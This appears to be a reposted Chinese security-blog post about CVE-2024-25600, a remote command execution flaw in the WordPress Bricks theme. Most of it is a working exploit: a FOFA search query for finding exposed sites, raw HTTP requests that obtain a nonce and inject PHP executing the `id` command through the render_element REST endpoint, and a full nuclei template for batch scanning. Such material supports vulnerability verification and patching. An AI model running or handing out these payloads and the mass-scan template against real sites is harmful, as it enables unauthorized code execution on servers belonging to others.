WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600

admin 2024年2月24日22:39:47评论52 views字数 1831阅读6分6秒阅读模式

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

WordPress的Bricks Builder <= 1.9.6主题存在远程命令执行漏洞CVE-2024-25600

fofa语句

body="/wp-content/themes/bricks/"

漏洞复现

访问获取nonce值

WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600

GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

使用获取到的nonce值,构造payload发包

WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 358
Content-Type: application/json
Accept-Encoding: gzip, deflate

{
"postId": "1",
"nonce": "第一步获取到的值",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}

nuclei批量验证

WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600

id: WordPress-RCE-CVE-2024-25600

info:
name: WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600
author: changge
severity: high
description: |
WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600
metadata:
fofa-query: body="/wp-content/themes/bricks/"
reference:
- https://127.0.0.1
tags: wpscan, cve, wordpress, wp, wp-plugin


http:
- raw:
- |
GET / HTTP/2
Host: {{Hostname}}

- |
POST /wp-json/bricks/v1/render_element HTTP/2
Host: {{Hostname}}
Content-Type: application/json

{
"postId": "1",
"nonce": "{{nonce}}",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}

extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'nonce":"([0-9a-z]+)'
internal: true

matchers:
- type: word
words:
- "Exception:"
- "uid"
part: body_2

github poc总汇地址:https://github.com/AYcg/poc

原文始发于微信公众号(AY长歌):WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日22:39:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress的Bricks主题存在远程命令执行漏洞CVE-2024-25600https://cn-sec.com/archives/2522442.html

发表评论

匿名网友 填写信息